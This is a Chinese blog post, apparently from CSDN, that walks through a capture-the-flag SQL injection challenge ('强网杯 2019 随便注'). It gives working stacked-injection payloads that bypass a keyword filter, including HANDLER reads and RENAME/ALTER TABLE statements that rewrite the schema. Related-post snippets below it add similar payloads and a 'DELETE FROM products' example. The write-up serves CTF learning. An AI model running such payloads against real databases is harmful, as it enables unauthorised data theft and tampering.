BUU sql注入-[强网杯 2019]随便注

最新推荐文章于 2024-04-19 18:32:25 发布
最新推荐文章于 2024-04-19 18:32:25 发布
阅读量1.7k 收藏 1
点赞数 2
分类专栏: BUUCTF writeup 文章标签: sql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ivyyyyyy1/article/details/120784950
版权

一、题目

 

 一进来先看看能否用构造单引号闭合:

 发现提示报错,可以操作了

二、解题

 方法一:handler命令打开

 

先查列数,这里是输入2没报错,但输入3报错了,所以是2列

试试联合查询

回显信息是

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

 $inject是我们在输入框中提交的变量名,preg_match()在这里的作用是检测关键字,猜测会被过滤掉,其中联合查询要用的select,where都不行,换个思路

这个时候想到堆叠注入

sql命令中,我们通常用 ; 来表示一句命令的结束,那么在多个命令语句中间插入 ; ,这些命令就可以一起执行,而联合查询中无论是union 还是union all ,能执行的语句类型都是有限的

直接查表

1';show tables;#

这一长串数字非常可疑,把里面的列show出来看看

 果然有flag

 现在我们只需要打开这个flag

在MySQL中有一种命令叫 handler

通过HANDLER tbl_name OPEN打开一张表,无返回结果,实际上我们在这里声明了一个名为tb1_name的句柄。
通过HANDLER tbl_name READ FIRST获取句柄的第一行,通过READ NEXT依次获取其它行。最后一行执行之后再执行NEXT会返回一个空的结果。

handler命令与select命令区别在于,前者一次只返回一行,而后者会返回所有相关结果

那么在这里直接构造payload

​
1';handler `1919810931114514` open;handler `1919810931114514` read first;#

 

直接爆出flag

方法二:用alertrename命令改名后查询

rename 用于修改 table 的名称

alter 用于修改表中字段的属性

参考:SQL Injection8(堆叠注入)——强网杯2019随便注_kid的博客-CSDN博客SQL Injection8(堆叠注入)——强网杯2019随便注前言前面参加强网杯线上赛,亲身体验了一把ctf从入门到入土,从打ctf变成被ctf打…这里结合里面的题来对里面的知识点进行一个学习总结随便注是一道sql注入题,因为过滤规则十分强大,所以很难…这里会用到堆叠注入的知识,堆叠注入前面有所了解,觉得并不难,所以也没练习过,但做这道题的时候就又些懵了。堆叠注入原理在SQL中,...https://blog.csdn.net/qq_26406447/article/details/90643951

1. 将已有的表words改名为words1

2. 表1919810931114514改名为words

3. 将新的表words中的列flag改为id

构造payload

1';RENAME TABLE `words` TO `words1`;RENAME TABLE `1919810931114514` TO `words`;ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;show columns from words;#

最后用1’ or 1=1 #查询就得到flag


三、总结

1. 注入语句中的关键字被形如preg_match()、mb_substr()、mb_subpos()等函数检测过滤后需要考虑其他方法,如堆叠注入,布尔盲注,时间盲注等

2. 注入大致步骤:检测能否注入->检测注入类型->order by查列数->show databases查库->show tables查表->show columns from TABLE_NAME查字段->select或handler开文件

3.  多看大佬的文章!!!

1vyyyyyy
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
05-26
BUU-Reveser-XMAN2018排位赛_easywasm(WebAssembly逆向分析)
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
最新发布
05-26
BUU刷题-Reveser-FlareOn5_Web2.0(WebAssembly逆向分析)
CTF-Web-Sql注入-强网杯 2019]随便
weixin_42566218的博客
02-21 1481
CTF-Web-Sql注入-强网杯 2019]随便 题目链接:BUUCTF 类型:sql注入 知识点:堆叠入、mysql句柄操作(handler) 解题过程 方法1 测试入点发现GET型字符入, ?inject=1' or '1'='1 order by爆破字段2 ?inject=1' order by 3%23 配合union select发现过滤规则 ?inject=1' union select 1,2%23 没有过滤分号,测试堆叠入成功,查询当前数据库的
BUUCTF【Web随便SQL注入
qq_70434663的博客
03-02 494
但是因为表过滤了select,所以使用rename先把words表改为其它的表名,在把1919810931114514表改为words表,给新的words表添加新的列名id,最后将flag改名为data。猜测是SQL注入,我们随便输入1'(单引号为英文状态下输入)发现报错提示表明此为单引号的SQL注入。第一步,测试入点(利用引号,and 1=1 ,or 1=1之类的判断是字符型还是数字型)我们发现在1919810931114514表里面爆出了flag字段,猜测flag就在里面。接下来,爆出两张表的内容。
BUUCTF关于sql注入的题目
2302_80935968的博客
04-19 699
测试的时候输入了 1’ and ‘1’='1这个有问题的payload,看报错信息中带有一个 and password=‘1’ and ‘1’=1 说明sql语句是SELECT * FROM tables WHERE username=‘1’ and ‘1’=1 and password=‘1’ and ‘1’=1 类似这样的查询,and 的两边同时为TRUE 结果才能为 TRUE,所以输入的payload一定要符合这个条件就可以登录成功了。(select 输入数据 || flag from Flag)
mysql_char ctf_buuctf_sql注入_随便1
weixin_34299849的博客
02-10 273
题目:随便1知识点:渗透相关知识:1.堆叠入2.猜解查询语句3.闭合sql语句的测试方法常规的sql语句:1.desc table:显示表结构2.show tables/show tables:显示所有表预处理语句:1.set 变量名=xxx:创建变量2.concat():可以拼接绕过字符过滤,执行sql方法,制造出目标的字符串3.prepare 语句名=字符串名:预处理,字符串赋值给语句并执...
SQL注入(堆叠入)——强网杯2019随便
cc菜的一批
06-10 1355
感谢BUUCTF平台提供题目 0x00 堆叠入原理 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠入。而union injection(联合入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FROM products服务器
SQL注入:堆叠入-强网杯[随便]
qq_68163788的博客
02-22 1070
堆叠入是指攻击者在SQL注入攻击中利用多个查询语句的堆叠,从而绕过应用程序的输入验证,进而执行恶意的SQL代码。攻击者可以通过在输入参数中插入分号或者其他分隔符,使得应用程序在执行SQL查询时将恶意代码与原有查询语句堆叠在一起,从而绕过输入验证,执行恶意代码。 堆叠入攻击可以导致严重的安全问题,包括数据泄露、数据篡改甚至数据库服务器的完全控制。为了防止堆叠入攻击,开发人员应该采取一系列安全措施,包括对输入参数进行严格的验证和过滤,使用参数化查询等安全措施来防止SQL注入攻击的发生。
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
POSN:POSN-BUU的源代码
04-01
POSN POSN-BUU的源代码
2020网鼎杯青龙组Boom
05-12
2020网鼎杯青龙组Boom。如果需要的可以下载,其实就是解方程而已,没啥难度。
BUU SQL COURSE 1 1(SQL注入
小谢的博客
10-25 2983
BUU SQL COURSE 1 1(SQL注入)题解
sql注入强网杯题目2019
h0ld1rs的博客
08-19 285
文章目录题目步骤1. 先确认存在入2.show tables3. show columns4. 更改表的字段 题目 步骤 1. 先确认存在入 使用 1‘ 发现报错 使用1'# 发现正常回显 2.show tables 构造payload1';show tables;# 3. show columns 1';show columns from words;# 根据两个表的查询可以知道,查询出的结果是一个数字加一个字符串,words表结构是id和data,传入的inject参数也就是赋值给了id,
BUU sql注入-[极客大挑战 2019]LoveSQL
Ivyyyyyy1的博客
10-17 3023
一、题目 梅开二度属于是 直接操作 二、解题 1. 检测入类型 我们用两个万能密码来检测 1 or 1=1# 1' or 1=1# 第一种万能密码对应检测的是数字型入,第二种是字符型入(因为字符通常用两个 ' 来标记,在1之后加 ' 构成闭合) 这里我们测试结果是用第二种万能密码登录成功,那么可以判断是字符型入 2. 入连招(查数爆库爆表爆列) 使用union select操作 1' order by 3# 1' order by...
BUU sql注入-[SUCTF 2019]EasySQL
Ivyyyyyy1的博客
10-17 3087
一、题目 点开页面,是一个提交表单 二、解题 1.先试试一些常规的姿势 输入数字有回显 输入其他字符(或数字后加单引号构造闭合)都没有回显,应该是关闭了错误提示 那么我们可以确定这里是字符型入 2. 优先考虑用联合查询 无论输啥数字都显示nonono,初步推断有关键字被后台过滤掉了 一个一个试(也可以在BP里面buzz测试) 常用的关键字只有show和select没被过滤掉(or被过滤了肯定order也用不...
BUU sql注入-[极客大挑战 2019]EasySQL
Ivyyyyyy1的博客
10-15 1184
一、题目 比较经典的黑客造型 sql注入题一般都是这种登录界面,开始操作 二、解题 1. 用户名输入 1' (1之后加个单引号是为了闭合数据库后台语句里面的引号,所以在这之后写sql命令可以实现恶意操作如查表、查列),这是最常用的判断手段 密码随便输 发现报错了,那么这里是存在入的 2. 先试试万能密码: 1' or 1=1# 这里说一下mysql中的各种释符 # : 单行释,直接释#之后的内容 -- : 单行释,区别是--后要加一...
buu(sql注入)
qq_62046696的博客
08-23 1167
打开界面,我们发现是 admin账号还是monster,这道题肯定与cookie有关,直接在cookie中。列数不对,or也被过滤,大小写,双写都不能绕过,呃呃呃,这样order,information都被过滤了。回显位置,2,3现在我们需要找一个命令替换掉,information.schema_tables,这应该是入点的位置, 发现# --+被过滤,然后是上传发现,没空格,那就有/**/代替空格。啥都没有,考察cookie用admin登录,都不需要密码,感觉挺离谱的,直接出来试一下monster,..
BUUCTF web SQL注入
m0_55854679的博客
08-09 2734
文章目录[极客大挑战 2019]EasySQL[强网杯 2019]随便[SUCTF 2019]EasySQL[极客大挑战 2019]LoveSQL[极客大挑战 2019]BabySQL [极客大挑战 2019]EasySQL 根据题目,可以使用万能密码来尝试登陆。 [强网杯 2019]随便 根据题目,可以想到此题目为sql注入,提交1与1’的结果如下 说明闭合方式为1’ 使用1‘ order by 查询字段数,得出为两列 1'; show tables;# 0'; show
BUU-web HardSQL
qq_46635165的博客
10-18 305
知识点: sql显错入 显错入:简单来说,就是通过某些函数回显的报错信息来获取我们想要的数据; 例如: mysql的 updatexml() 函数:由于 select user() 查询出的数据不符合 XPATH 语法,从而报错,顺便将 select user() 这条语句执行,并将结果以报错的方式显示出来; 解题: 打开解题网址,账户密码登录框,尝试单引号报错,报错成功; 单引号闭合,并 # 号释:闭合成功; 接下来尝试 order by 字段猜测,发现 被过滤:并且过滤了 union ,a.
BUU SQL COURSE
09-19
BUU SQL COURSE是一个SQL注入的实战演练平台。在这个平台上,你可以学习SQL注入的知识点,了解SQL注入的前置知识和一般测试步骤,并使用这些知识来解题。在入过程中,一般需要找到入点,闭合语句,带入语句进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值